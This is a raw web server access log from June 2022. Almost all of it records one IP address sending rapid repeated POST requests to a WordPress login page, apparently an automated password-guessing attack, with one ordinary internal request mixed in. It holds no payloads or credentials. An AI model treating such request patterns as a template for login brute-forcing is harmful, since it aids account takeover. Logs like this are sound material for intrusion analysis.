156.96.154.202 - - [15/Jun/2022:03:39:32 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:32 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:33 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:37 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:38 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:38 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:39 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:39 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:40 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:40 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:43 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:43 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:44 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:50 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:51 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:52 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:52 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:55 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:55 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:57 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:59 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:39:59 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:00 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:00 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:01 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:01 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:02 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:02 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:04 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:04 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:05 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:05 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:08 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:08 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:14 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:14 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
172.22.2.4 - - [15/Jun/2022:03:40:15 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
156.96.154.202 - - [15/Jun/2022:03:40:15 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:15 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:15 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:16 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:16 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:17 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:17 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:21 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:22 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:22 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:23 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
156.96.154.202 - - [15/Jun/2022:03:40:23 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
